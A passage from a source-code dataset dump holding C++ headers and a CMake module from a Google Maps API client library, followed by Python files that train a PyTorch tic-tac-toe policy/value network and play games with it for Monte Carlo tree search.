file\n\t\t\tstd::string err;\n\t\t\tjson11::Json configJson = json11::Json::parse(buffer.str(), err);\n\t\t\tif (!err.empty()) {\n\t\t\t\tthrow std::domain_error(\"Invalid format configuration file: \" + err);\n\t\t\t} else {\n\t\t\t\t__cfgstr__ = configJson.dump();\n\t\t\t\t// GoogleMaps APIs settings\n\t\t\t\tconst json11::Json gmApiConfig = configJson[\"gm_api\"];\n\t\t\t\tif (!gmApiConfig.is_null()) {\n\t\t\t\t\t__settings__[API_KEY] \t\t= gmApiConfig[\"api_key\"].string_value();\n\t\t\t\t\t__settings__[USE_CLIENT_ID] = gmApiConfig[\"use_clientid\"].string_value();\n\t\t\t\t\t__settings__[CLIENT_ID] \t= gmApiConfig[\"client_id\"].string_value();\n\t\t\t\t\t__settings__[CLIENT_SECRET] = gmApiConfig[\"client_secret\"].string_value();\n\t\t\t\t\t__settings__[MODE] \t\t\t= gmApiConfig[\"mode\"].string_value();\n\t\t\t\t\t__settings__[LANG] \t\t\t= gmApiConfig[\"language\"].string_value();\n\t\t\t\t}\n\t\t\t\t// Database-related settings\n\t\t\t\tconst json11::Json mysqlDBConfig = configJson[\"databases\"][\"mysql\"];\n\t\t\t\tif (!mysqlDBConfig.is_null()) {\n\t\t\t\t\t__settings__[MYSQL_DB_NAME] = mysqlDBConfig[\"db_name\"].string_value();\n\t\t\t\t\t__settings__[MYSQL_HOST] \t= mysqlDBConfig[\"host\"].string_value();\n\t\t\t\t\t__settings__[MYSQL_USER] \t= mysqlDBConfig[\"user\"].string_value();\n\t\t\t\t\t__settings__[MYSQL_PWD] \t= mysqlDBConfig[\"passwd\"].string_value();\n\t\t\t\t}\n\t\t\t\t// Query limits\n\t\t\t\tconst json11::Json queryLimitsConfig = configJson[\"query_limits\"];\n\t\t\t\tif (!queryLimitsConfig.is_null()) {\n\t\t\t\t\t__settings__[START] \t\t\t= queryLimitsConfig[\"start\"].string_value();\n\t\t\t\t\t__settings__[COUNT] \t\t\t= queryLimitsConfig[\"count\"].string_value();\n\t\t\t\t\t__settings__[QPS]\t\t\t\t= queryLimitsConfig[\"queries_per_second\"].string_value();\n\t\t\t\t\t__settings__[CADENCE] \t\t\t= queryLimitsConfig[\"cadence\"].string_value();\n\t\t\t\t\t__settings__[DISTANCE_LIMIT] \t= queryLimitsConfig[\"distance_limit_km\"].string_value();\n\t\t\t\t\t__settings__[OUTPUT_FILE]\t\t= queryLimitsConfig[\"output_file\"].string_value();\n\t\t\t\t}\n\t\t\t}\n\t\t\tconfigSource.close();\n\t\t} else {\n\t\t\tstd::cerr << \"Could not open configuration file.\" << std::endl;\n\t\t}\n\t}\n\nprivate:\n\tstd::map<Setting, std::string> __settings__;\n\tstd::string __cfgstr__;\n\tstatic ConfigLoader * instance;\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.7005672454833984,
"alphanum_fraction": 0.7090761661529541,
"avg_line_length": 26.730337142944336,
"blob_id": "94b05c9d080fe40218116717110590cc2288f370",
"content_id": "8a9fa7d78db82655dff800d7a79a5af6b98b43c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2468,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 89,
"path": "/include/gmaps11/http/http_client.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * http_client.h :\n * \t\tCore client functionality, common across all API requests\n * \t\t(including performing HTTP requests).\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef _CLIENT_HTTP_CLIENT_HPP_\n#define _CLIENT_HTTP_CLIENT_HPP_\n\n#include <string>\n#include <map>\n#include <chrono>\n#include <ctime>\n#include <cmath> // std::pow\n#include <cstdlib>\n#include <thread>\n#include <sstream>\n#include <algorithm> // std::sort\n#include <iostream> // std::cout\n// boost\n#include <boost/algorithm/string/join.hpp> // join\n#include <boost/algorithm/string/predicate.hpp> // starts_with\n#include <boost/lexical_cast.hpp>\n#include <boost/optional.hpp>\n#include <boost/python.hpp>\n// boost - using Python 2.x\n#include <python2.7/Python.h>\n#include <boost/filesystem.hpp>\n\n// curlcpp\n#include <curlcpp/curl_easy.h>\n#include <functional> // std::function\n#include \"../json/json11.hpp\" // Json::Parse(str, err)\n// meta stuff\n#include \"../utility/meta.hpp\"\n// exceptions\n#include \"../except/exceptions.hpp\"\n#include <stdexcept>\n\n/*\n * Core client functionality, common across all API requests (including performing HTTP requests).\n */\nnamespace http {\nusing namespace std::chrono;\n\ntypedef time_point<system_clock> Timestamp;\ntypedef std::map<std::string, std::string> UrlParams;\n\nstatic const std::string googleapis_BASE_URL(\"https://maps.googleapis.com\");\nstatic const std::vector<long> RETRIABLE_STATUSES = { 500, 503, 504 };\n\n\nclass Client {\npublic:\n\tClient(std::string key = \"\", std::string client_id = \"\",\n\t\t\tstd::string client_secret = \"\", int timeout = -1,\n\t\t\tint connect_timeout = -1, int retry_timeout = 60);\n\n\tstd::string Get(std::string url, UrlParams params, bool accepts_clientid = false,\n\t\t\tboost::optional<Timestamp> first_request_time = boost::none,\n\t\t\tint retry_counter = 0, std::string base_url = googleapis_BASE_URL,\n\t\t\tstd::function<std::string(std::string)> extract_body = nullptr);\n\nprivate:\n\tdouble unirand();\n\tstd::string get_body(std::string response);\n\tstd::string urlencode_params(const UrlParams & params);\n\tstd::string sign_url(std::string secret, std::string url_payload);\n\tstd::string generate_auth_url(std::string path, UrlParams params,\n\t\t\tbool accepts_clientid);\n\tstd::string parse_python_exception();\n\nprivate:\n\tstd::string key_;\n\tint timeout_;\n\tint connect_timeout_;\n\n\tint retry_timeout_;\n\tstd::string client_id_;\n\tstd::string client_secret_; // base64 encoded\n\tboost::python::object crypto_mod_;\n};\n\n}\n\n#endif /* _CLIENT_HTTP_CLIENT_HPP_ */\n"
},
{
"alpha_fraction": 0.6967020034790039,
"alphanum_fraction": 0.6978798508644104,
"avg_line_length": 25.123077392578125,
"blob_id": "2fb9fe0792d1d4f24fcb7b763123c9ce3b887f92",
"content_id": "cba0fe849fb32c25f499219bf9259351320e8deb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1698,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 65,
"path": "/include/gmaps11/utility/convert.hpp",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "/*\n * convert.h:\n * \t\tConvert complex types to string representations suitable for Google Maps server.\n *\n * Author: Faissal Elamraoui\n */\n#pragma once\n\n#ifndef _UTILITY_CONVERT_HPP_\n#define _UTILITY_CONVERT_HPP_\n\n#include <string>\n#include <sstream>\n#include <vector>\n#include <boost/lexical_cast.hpp>\n#include <boost/variant.hpp>\n#include <boost/algorithm/string/join.hpp>\n#include <boost/tuple/tuple.hpp>\n#include <algorithm>\n\n// A tuple of lat/lng values\ntypedef boost::tuple<double, double> latlng_t;\n// A waypoint can be identified by an address (string)\n// or a LatLng tuple (latlng_t)\ntypedef boost::variant<std::string, latlng_t> waypoint_t;\n\nclass wp_stringify: public boost::static_visitor<std::string> {\npublic:\n\tstd::string operator()(std::string const & str) const {\n\t\treturn str;\n\t}\n\tstd::string operator()(latlng_t const & t) const {\n\t\tstd::stringstream ss;\n\t\tss << t.get<0>() << \",\" << t.get<1>();\n\t\treturn ss.str();\n\t}\n};\n\nclass convert {\n\ttypedef std::vector<waypoint_t> Container;\npublic:\n\tinline static std::vector<std::string> transform_list(Container target) {\n\t\t// Stringify everything in the container\n\t\twp_stringify str_visitor;\n\n\t\tstd::vector<std::string> trans_list;\n\t\ttrans_list.reserve(target.size());\n\t\tfor (auto & elem : target)\n\t\t\ttrans_list.push_back(boost::apply_visitor(str_visitor, elem));\n\n\t\treturn trans_list;\n\t}\n\n\tinline static std::string join_list(const char * sep, Container list) {\n\t\tstd::vector<std::string> _list = transform_list(list);\n\t\treturn boost::algorithm::join(_list, sep);\n\t}\n\n\tinline static std::string as_string(waypoint_t wp) {\n\t\twp_stringify str_visitor;\n\t\treturn boost::apply_visitor(str_visitor, wp);\n\t}\n};\n\n#endif /* _UTILITY_CONVERT_HPP_ */\n"
},
{
"alpha_fraction": 0.7331499457359314,
"alphanum_fraction": 0.7331499457359314,
"avg_line_length": 41.764705657958984,
"blob_id": "faaff25d65f04b5460cd6fe70e7127df661822bd",
"content_id": "6de82266553ef1768f2747d4f6ed2334c50ec269",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 727,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 17,
"path": "/cmake/Modules/FindCurlcpp.cmake",
"repo_name": "amrfaissal/gmaps11",
"src_encoding": "UTF-8",
"text": "find_library (Curlcpp_LIBRARIES NAMES curlcpp HINTS /usr/local/lib NO_DEFAULT_PATH)\nfind_path (Curlcpp_INCLUDE_DIRS curl_config.h curl_header.h curl_option.h curl_share.h\n\t\t\t\t\t\t\tcurl_easy.h curl_info.h curl_pair.h curl_utility.h\n\t\t\t\t\t\t\tcurl_exception.h curl_interface.h curl_receiver.h curl_writer.h\n\t\t\t\t\t\t\tcurl_form.h curl_multi.h curl_sender.h\n\t\t\t\t\t\t\t/usr/local/include/curlcpp)\n\nif (${Curlcpp_LIBRARIES} MATCHES \"NOTFOUND\")\n set (Curlcpp_FOUND FALSE CACHE INTERNAL \"\")\n message (STATUS \"Curlcpp library not found\")\n unset (Curlcpp_LIBRARIES)\nelse()\n set (Curlcpp_FOUND TRUE CACHE INTERNAL \"\")\n message (STATUS \"Found Curlcpp library: ${Curlcpp_LIBRARIES}\")\nendif()\n\nset(CMAKE_REQUIRED_INCLUDES ${Curlcpp_INCLUDE_DIRS})\n"
}
] | 16 |
promach/mcts | https://github.com/promach/mcts | 6952e5ac8d3b5841035da01513e433e6139f2cf1 | ab9cfae880e995d4c988970f8594aa7fcc88c517 | 8714993db04c0c9c650a3b02b29a992a4d8bbb2b | refs/heads/main | 2023-03-26T04:34:44.688549 | 2021-03-27T02:27:29 | 2021-03-27T02:27:29 | 322,852,067 | 2 | 0 | null | 2020-12-19T13:18:54 | 2021-02-09T12:15:02 | 2021-02-09T13:16:15 | Python | [
{
"alpha_fraction": 0.5612593293190002,
"alphanum_fraction": 0.5724048018455505,
"avg_line_length": 35.259586334228516,
"blob_id": "1c41be6d9a9ae54599ec7ed830800eaceaf6562b",
"content_id": "d67673132ca6a0fc59659ba727bbd90791f6b1b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12292,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 339,
"path": "/Net.py",
"repo_name": "promach/mcts",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom sklearn.model_selection import train_test_split\n\nTEST_DATASET_RATIO = 0.05 # 5 percent of the dataset is dedicated for testing purpose\nNUM_OF_BOARD_FEATURES = 18 # Both players A and B have 9 boxes to fill\nPLAYER_TURN_COLUMN = -2 # second to last column of the csv file\nSCORE_COLUMN = -1 # last column of the csv file\nNUM_OF_BOARD_FEATURES_AND_TURN = NUM_OF_BOARD_FEATURES + 1 # add 1 because of player turn\nNUM_OF_POSSIBLE_MOVES = 9 # a normal 3x3 tic-tac-toe has 9 input boxes\nNUM_OF_POSSIBLE_SCORES = 3 # -1, 0, 1 == loss, draw, win\n# POSSIBLE_SCORES = [-1, 0, 1]\nSIZE_OF_HIDDEN_LAYERS = 64\nNUM_EPOCHS = 6000\nLEARNING_RATE = 0.7\nMOMENTUM = 0.9\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n\n self.linears = nn.Sequential(\n nn.Linear(NUM_OF_BOARD_FEATURES_AND_TURN, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, NUM_OF_POSSIBLE_MOVES)\n )\n\n self.linears2 = nn.Sequential(\n nn.Linear(NUM_OF_BOARD_FEATURES_AND_TURN, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, SIZE_OF_HIDDEN_LAYERS),\n nn.ReLU(),\n nn.Dropout(),\n\n nn.Linear(SIZE_OF_HIDDEN_LAYERS, NUM_OF_POSSIBLE_SCORES),\n nn.Softmax(1)\n )\n\n def forward(self, x):\n policy = self.linears(x)\n value = self.linears2(x)\n\n return policy, value # move, score\n\n\nUSE_CUDA = torch.cuda.is_available()\n\n\ndef train():\n # part of the code is referenced from\n # https://github.com/bsamseth/tictacNET/blob/master/tictacnet.py and\n # https://github.com/bsamseth/tictacNET/blob/master/tictactoe-data.csv\n\n df = pd.read_csv(\"tictactoe-data.csv\")\n print(\"Scores:\", Counter(df[\"score\"]))\n\n # Input is all the board features (2x9 squares) plus the turn.\n board_features_and_turn = df.iloc[:, list(range(NUM_OF_BOARD_FEATURES)) + [PLAYER_TURN_COLUMN]]\n\n # To predict score instead, use this as the target:\n # score = pd.get_dummies(df['score'])\n # print(score)\n\n # split into training dataset (80%) and validation dataset (20%)\n # https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html and\n # https://scikit-learn.org/stable/glossary.html#term-random_state show that splitting is randomized.\n # Since the dataset involving 1 input and 2 outputs, need to combine the 2 outputs first before splitting\n # in order to preserve data alignment\n\n # Target variables are the possible move squares as well as the predicted output scores\n moves_score = df.iloc[:, list(range(NUM_OF_BOARD_FEATURES, NUM_OF_BOARD_FEATURES + NUM_OF_POSSIBLE_MOVES)) +\n [SCORE_COLUMN]]\n # print(moves_score)\n\n board_train, board_test, moves_score_train, moves_score_test = \\\n train_test_split(board_features_and_turn, moves_score, test_size=TEST_DATASET_RATIO)\n # print(board_test)\n\n moves_test = moves_score_test.iloc[:, list(range(0, NUM_OF_POSSIBLE_MOVES))]\n score_test = moves_score_test.iloc[:, [NUM_OF_POSSIBLE_MOVES]]\n\n moves_train = moves_score_train.iloc[:, list(range(0, NUM_OF_POSSIBLE_MOVES))]\n score_train = moves_score_train.iloc[:, [NUM_OF_POSSIBLE_MOVES]]\n\n print(len(score_train))\n print(len(score_test))\n\n net = Net()\n if USE_CUDA:\n net = net.cuda()\n print(net)\n\n params = list(net.parameters())\n print(len(params))\n\n # for x in range(10):\n # print(params[x].size()) # conv1's .weight\n\n optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE, momentum=MOMENTUM)\n\n loss_function2 = nn.CrossEntropyLoss()\n loss_function = nn.MSELoss()\n\n TRAIN_BATCH_SIZE = int(len(moves_score) * (1 - TEST_DATASET_RATIO))\n\n for epoch in range(NUM_EPOCHS):\n loss_ = 0\n\n # See https://github.com/bsamseth/tictacNET/issues/2\n # for a description of the inputs and output of the neural network\n train_loader = zip(np.array(board_train, dtype='float32'),\n np.array(moves_train, dtype='float32'),\n np.array(score_train, dtype='float32'))\n train_loader = torch.utils.data.DataLoader(\n list(train_loader),\n batch_size=TRAIN_BATCH_SIZE,\n )\n\n for _board_features_and_turn, move, _score in train_loader:\n if USE_CUDA:\n _board_features_and_turn = _board_features_and_turn.cuda()\n move = move.cuda()\n _score = _score.cuda()\n\n # Forward Pass\n policy_output, value_output = net(_board_features_and_turn)\n\n # Loss at each iteration by comparing to target(moves)\n loss1 = loss_function(policy_output, move)\n\n # Loss at each iteration by comparing to target(score)\n # adds 1 to _score because cross_entrophy loss cannot accept input value of -1\n # https://github.com/pytorch/pytorch/issues/1204#issuecomment-292746566\n loss2 = loss_function2(value_output, (_score + 1).squeeze(1).long())\n\n loss = loss1 + loss2\n\n # Backpropagating gradient of loss\n optimizer.zero_grad()\n loss.backward()\n\n # Updating parameters(weights and bias)\n optimizer.step()\n\n loss_ += loss.item()\n print(\"Epoch{}, Training loss:{}\".format(epoch, loss_ / len(moves_train)))\n\n print('Finished Training')\n\n path = './tictactoe_net.pth'\n torch.save(net, path)\n\n print(\"############################################\")\n print(\"Doing train_accuracy check\")\n\n train_correct = 0\n train_total = 0\n\n train_loader = zip(np.array(board_train, dtype='float32'),\n np.array(moves_train, dtype='float32'),\n np.array(score_train, dtype='float32'))\n train_loader = torch.utils.data.DataLoader(\n list(train_loader),\n batch_size=TRAIN_BATCH_SIZE,\n )\n\n with torch.no_grad():\n for _board_train, _moves_train, _score_train in train_loader:\n if USE_CUDA:\n _board_train = _board_train.cuda()\n _moves_train = _moves_train.cuda()\n _score_train = _score_train.cuda()\n\n model_input = _board_train\n _policy_output, _value_output = net(model_input)\n predicted = torch.argmax(_policy_output, 1)\n\n # print(\"_policy_output = \", _policy_output)\n # print(\"predicted = \", predicted)\n # print(\"_moves_train = \", _moves_train)\n\n for train_index in range(len(_moves_train)):\n # print(\"move testing for train_index = \", train_index)\n\n # print(\"_moves_train[train_index][predicted[train_index]] = \",\n # _moves_train[train_index][predicted[train_index]], '\\n')\n\n if _moves_train[train_index][predicted[train_index]]:\n # print(\"predicted == _moves_train\")\n train_correct = train_correct + 1\n\n train_total = train_total + len(_moves_train)\n\n print('Accuracy of the network on train move: %d %%' % (\n 100 * train_correct / train_total))\n\n train_correct = 0\n train_total = 0\n\n with torch.no_grad():\n for _board_train, _moves_train, _score_train in train_loader:\n if USE_CUDA:\n _board_train = _board_train.cuda()\n _moves_train = _moves_train.cuda()\n _score_train = _score_train.cuda()\n\n model_input = _board_train\n _policy_output, _value_output = net(model_input)\n predicted = torch.argmax(_value_output, 1)\n\n # print(\"_value_output = \", _value_output)\n # print(\"predicted = \", predicted)\n # print(\"_score_train = \", _score_train)\n\n for train_index in range(len(_score_train)):\n # print(\"score testing for train_index = \", train_index)\n\n # print(\"_score_train[train_index] = \", _score_train[train_index], '\\n')\n\n # substract 1 because score is one of these [-1, 0, 1] values\n if (predicted[train_index] - 1) == _score_train[train_index]:\n # print(\"predicted == _score_train\")\n train_correct = train_correct + 1\n\n train_total = train_total + len(_score_train)\n\n print('Accuracy of the network on train score: %d %%' % (\n 100 * train_correct / train_total))\n\n print(\"############################################\")\n print(\"Doing test_accuracy check\")\n\n # validate the trained NN model for both predicted recommended move\n # and its corresponding predicted score\n TEST_BATCH_SIZE = int(len(moves_score) * TEST_DATASET_RATIO) # 4520*0.8\n\n test_correct = 0\n test_total = 0\n\n test_loader = zip(np.array(board_test, dtype='float32'),\n np.array(moves_test, dtype='float32'),\n np.array(score_test, dtype='float32'))\n test_loader = torch.utils.data.DataLoader(\n list(test_loader),\n batch_size=TEST_BATCH_SIZE,\n )\n # print(test_loader)\n\n with torch.no_grad():\n for _board_test, _moves_test, _score_test in test_loader:\n if USE_CUDA:\n _board_test = _board_test.cuda()\n _moves_test = _moves_test.cuda()\n _score_test = _score_test.cuda()\n\n model_input = _board_test\n _policy_output, _value_output = net(model_input)\n predicted = torch.argmax(_policy_output, 1)\n\n # print(\"_policy_output = \", _policy_output)\n # print(\"predicted = \", predicted)\n # print(\"_moves_test = \", _moves_test)\n\n for test_index in range(len(_moves_test)):\n # print(\"move testing for test_index = \", test_index)\n\n # print(\"_moves_test[test_index][predicted[test_index]] = \",\n # _moves_test[test_index][predicted[test_index]], '\\n')\n\n if _moves_test[test_index][predicted[test_index]]:\n # print(\"predicted == _moves_test\")\n test_correct = test_correct + 1\n\n test_total = test_total + len(_moves_test)\n\n print('Accuracy of the network on test move: %d %%' % (\n 100 * test_correct / test_total))\n\n test_correct = 0\n test_total = 0\n\n with torch.no_grad():\n for _board_test, _moves_test, _score_test in test_loader:\n if USE_CUDA:\n _board_test = _board_test.cuda()\n _moves_test = _moves_test.cuda()\n _score_test = _score_test.cuda()\n\n model_input = _board_test\n _policy_output, _value_output = net(model_input)\n predicted = torch.argmax(_value_output, 1)\n\n # print(\"_value_output = \", _value_output)\n # print(\"predicted = \", predicted)\n # print(\"_score_test = \", _score_test)\n\n for test_index in range(len(_score_test)):\n # print(\"move testing for test_index = \", test_index)\n\n # print(\"_score_test[test_index][predicted[test_index]] = \",\n # _score_test[test_index][predicted[test_index]], '\\n')\n\n # substract 1 because score is one of these [-1, 0, 1] values\n if (predicted[test_index] - 1) == _score_test[test_index]:\n # print(\"predicted == _score_test\")\n test_correct = test_correct + 1\n\n test_total = test_total + len(_score_test)\n\n print('Accuracy of the network on test score: %d %%' % (\n 100 * test_correct / test_total))\n\n\nif __name__ == \"__main__\":\n train()\n"
},
{
"alpha_fraction": 0.603706955909729,
"alphanum_fraction": 0.6174365282058716,
"avg_line_length": 34.40625,
"blob_id": "aba74f03a9d10cb66be0facd4f3be8bbc2ddaf1e",
"content_id": "bbf2aea9d439d3e2d9bdffc87b6beab1d7c63bb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10197,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 288,
"path": "/play.py",
"repo_name": "promach/mcts",
"src_encoding": "UTF-8",
"text": "# This file is the test/inference coding\n# See https://github.com/bsamseth/tictacNET/issues/2\n# for a description of the inputs and output of the neural network\n\nimport numpy as np\nimport torch\nimport random\nfrom Net import Net\n\n\nCROSS, NOUGHT = 0, 1\nPLAYERS = [CROSS, NOUGHT]\nTOTAL_NUM__OF_BOXES = 9 # 3x3 tic-tac-toe\n\n\n# Winning patterns encoded in bit patterns.\n# E.g. three in a row in the top row is\n# 448 = 0b111000000\nWINNING_PATTERNS = [448, 56, 7, 292, 146, 73, 273, 84] # Row # Columns # Diagonals\nTIE_DRAW = 0\nCROSS_IS_WINNER = 1\nNOUGHT_IS_WINNER = 2\nNO_WINNING_PLAYER_YET = 3\n\n\ndef binary_to_string(input_binary):\n mask = 0b1\n output = \"\"\n for i in range(TOTAL_NUM__OF_BOXES):\n if mask & input_binary:\n output += '1'\n else:\n output += '0'\n mask <<= 1\n return output[::-1]\n\n\ndef update_move(_next_move, _next_move_probabilities, _player_turn, _cross_positions, _nought_positions):\n print(\"we will update the next_move accordingly inside this function\")\n\n _next_move = np.binary_repr(_next_move_probabilities.argmax())\n\n # What if the square box (next_move) is already filled by the other player ?\n # then we will have to go for the next less preferred next_move\n # During actual project in later stage, we will use Monte-Carlo Tree Search\n # instead of the following logic\n cross_positions_str = binary_to_string(int(_cross_positions, 2))\n nought_positions_str = binary_to_string(int(_nought_positions, 2))\n _next_move_in_integer = int(_next_move, 2)\n\n print(\"next_move in integer = \", _next_move_in_integer)\n print(\"cross_positions_str = \", cross_positions_str)\n print(\"nought_positions_str = \", nought_positions_str)\n\n # if opponent player had filled the square box position\n # OR the same player had filled the same square box position\n if ((_player_turn == CROSS) and (nought_positions_str[_next_move_in_integer] == '1')) or \\\n ((_player_turn == NOUGHT) and (cross_positions_str[_next_move_in_integer] == '1')) or \\\n ((_player_turn == CROSS) and (cross_positions_str[_next_move_in_integer] == '1')) or \\\n ((_player_turn == NOUGHT) and (nought_positions_str[_next_move_in_integer] == '1')):\n\n print(\"going for second preferred next move\")\n print(\"next_move_probabilities = \", _next_move_probabilities)\n _next_move_probabilities[0, _next_move_in_integer] = 0 # makes way for less preferred next_move\n print(\"after setting certain bit to 0, next_move_probabilities = \", _next_move_probabilities)\n _next_move = np.binary_repr(_next_move_probabilities.argmax())\n\n # checks again whether this less preferred next_move had already been played before\n _next_move = update_move(_next_move, _next_move_probabilities, _player_turn,\n _cross_positions, _nought_positions)\n\n return _next_move\n\n\ndef player_cross_has_winning_patterns(_cross_positions):\n # needs to match every bits in the WINNING_PATTERNS\n if any(\n np.bitwise_and(win, int(_cross_positions, 2)) == win\n for win in WINNING_PATTERNS\n ):\n return 1\n\n else:\n return 0\n\n\ndef player_nought_has_winning_patterns(_nought_positions):\n # needs to match every bits in the WINNING_PATTERNS\n if any(\n np.bitwise_and(win, int(_nought_positions, 2)) == win\n for win in WINNING_PATTERNS\n ):\n return 1\n\n else:\n return 0\n\n\ndef initialize():\n # initial game config\n random_player_start_turn_ = random.randint(CROSS, NOUGHT)\n cross_positions_ = '000000000'\n nought_positions_ = '000000000'\n player_turn_ = random_player_start_turn_\n model_input_ = cross_positions_ + nought_positions_ + str(player_turn_)\n # next_move_ = 99999999999999 # just for initialization\n # next_move_probabilities = np.zeros(TOTAL_NUM__OF_BOXES) # 9 boxes choice\n # predicted_score = np.zeros(3) # loss, draw, win\n # out = [next_move_probabilities, predicted_score]\n\n trained_model_path = './tictactoe_net.pth'\n\n # Load\n model_ = torch.load(trained_model_path)\n model_.eval()\n\n return cross_positions_, nought_positions_, model_, model_input_, player_turn_\n\n\ndef play(using_mcts, best_child_node, model, model_input, player_turn, cross_positions, nought_positions):\n USE_CUDA = torch.cuda.is_available()\n\n if USE_CUDA:\n out_policy, out_value = model(torch.from_numpy(\n np.array([int(v) for v in model_input], dtype='float32')[np.newaxis]\n ).cuda())\n\n else:\n out_policy, out_value = model(torch.from_numpy(\n np.array([int(v) for v in model_input], dtype='float32')[np.newaxis]\n ))\n\n print(\"out_policy = \", out_policy)\n print(\"out_value = \", out_value)\n next_move_probabilities = out_policy\n\n if using_mcts: # will determine next_move according to highest PUCT values of child nodes\n next_move = best_child_node\n\n else:\n # updates next_move\n next_move = torch.argmax(next_move_probabilities)\n\n next_move = update_move(next_move, next_move_probabilities, player_turn, cross_positions, nought_positions)\n next_move_in_integer = int(next_move, 2)\n\n print(\"Confirmed next_move = \", next_move_in_integer)\n\n # updates cross_positions or NAUGHT_POSITIONS (based on next_move output from NN)\n # depending on which player turn\n if player_turn == CROSS:\n # bitwise OR (cross_positions, next_move)\n cross_positions = binary_to_string(int(cross_positions, 2) |\n (1 << (TOTAL_NUM__OF_BOXES-next_move_in_integer-1)))\n\n else:\n # bitwise OR (nought_positions, next_move)\n nought_positions = binary_to_string(int(nought_positions, 2) |\n (1 << (TOTAL_NUM__OF_BOXES-next_move_in_integer-1)))\n\n print(\"cross_positions = \", cross_positions)\n print(\"nought_positions = \", nought_positions)\n\n print(\"player_turn = \", player_turn)\n\n # updates model_input for next player turn\n model_input = cross_positions + nought_positions + str(player_turn)\n\n print(\"model_input = \", model_input)\n print(\"\\n\")\n\n return out_value, cross_positions, nought_positions, model_input\n\n\nif __name__ == '__main__':\n\n print(\"standalone inference coding\")\n game_is_on = 1\n num_of_play_rounds = 0\n _cross_positions, _nought_positions, _model, _model_input, _player_turn = initialize()\n\n # while (cross_positions != WINNING_PATTERNS) | (nought_positions != WINNING_PATTERNS):\n while game_is_on: # game is still ON\n num_of_play_rounds = num_of_play_rounds + 1\n\n __out_value, __cross_positions, __nought_positions, _model_input \\\n = play(0, 0, _model, _model_input, _player_turn, _cross_positions, _nought_positions)\n\n out_score = torch.argmax(__out_value)\n game_is_on = num_of_play_rounds < TOTAL_NUM__OF_BOXES\n\n cross_had_won = player_cross_has_winning_patterns(__cross_positions)\n nought_had_won = player_nought_has_winning_patterns(__nought_positions)\n\n if (game_is_on == 0) & (cross_had_won == 0) & (nought_had_won == 0):\n print(\"game finished with draw\")\n break\n\n if cross_had_won:\n print(\"game finished with player CROSS being the winner\")\n break\n\n if nought_had_won:\n print(\"game finished with player NOUGHT being the winner\")\n break\n\n _cross_positions = __cross_positions\n _nought_positions = __nought_positions\n\n # switches player turn after each step\n if _player_turn == CROSS:\n _player_turn = NOUGHT\n\n else:\n _player_turn = CROSS\n\n game_is_on = 0\n print(\"game finished\")\n\nelse: # executed from mcts.py\n\n print(\"using mcts\")\n _cross_positions = 0\n _nought_positions = 0\n _model = 0\n _model_input = 0\n _player_turn = 0\n num_of_play_rounds = 0\n game_is_on = 0 # initialized to 0 because game has not started yet\n out_score = 0\n\n def mcts_play(is_mcts_in_simulate_stage=0, ongoing_game=0, best_child_node=0):\n\n global _cross_positions\n global _nought_positions\n global _model\n global _model_input\n global _player_turn\n global num_of_play_rounds\n global game_is_on\n global out_score\n\n if is_mcts_in_simulate_stage:\n print(\"is_mcts_in_simulate_stage\")\n\n if ongoing_game == 0: # first step of the game\n print(\"ongoing_game == 0\")\n game_is_on = 1\n num_of_play_rounds = 0\n _cross_positions, _nought_positions, _model, _model_input, _player_turn = initialize()\n\n print(\"ongoing_game == 1\")\n num_of_play_rounds = num_of_play_rounds + 1\n print(\"num_of_play_rounds = \", num_of_play_rounds)\n\n __out_value, __cross_positions, __nought_positions, _model_input \\\n = play(1, best_child_node, _model, _model_input, _player_turn, _cross_positions, _nought_positions)\n\n out_score = torch.argmax(__out_value)\n game_is_on = num_of_play_rounds < TOTAL_NUM__OF_BOXES\n\n cross_had_won = player_cross_has_winning_patterns(__cross_positions)\n nought_had_won = player_nought_has_winning_patterns(__nought_positions)\n\n if (game_is_on == 0) & (cross_had_won == 0) & (nought_had_won == 0):\n print(\"game finished with draw\")\n return TIE_DRAW\n\n if cross_had_won:\n print(\"game finished with player CROSS being the winner\")\n return CROSS_IS_WINNER\n\n if nought_had_won:\n print(\"game finished with player NOUGHT being the winner\")\n return NOUGHT_IS_WINNER\n\n _cross_positions = __cross_positions\n _nought_positions = __nought_positions\n\n # switches player turn after each step\n print(\"switches player turn\")\n if _player_turn == CROSS:\n _player_turn = NOUGHT\n\n else:\n _player_turn = CROSS\n\n return NO_WINNING_PLAYER_YET\n"
},
{
"alpha_fraction": 0.6183517575263977,
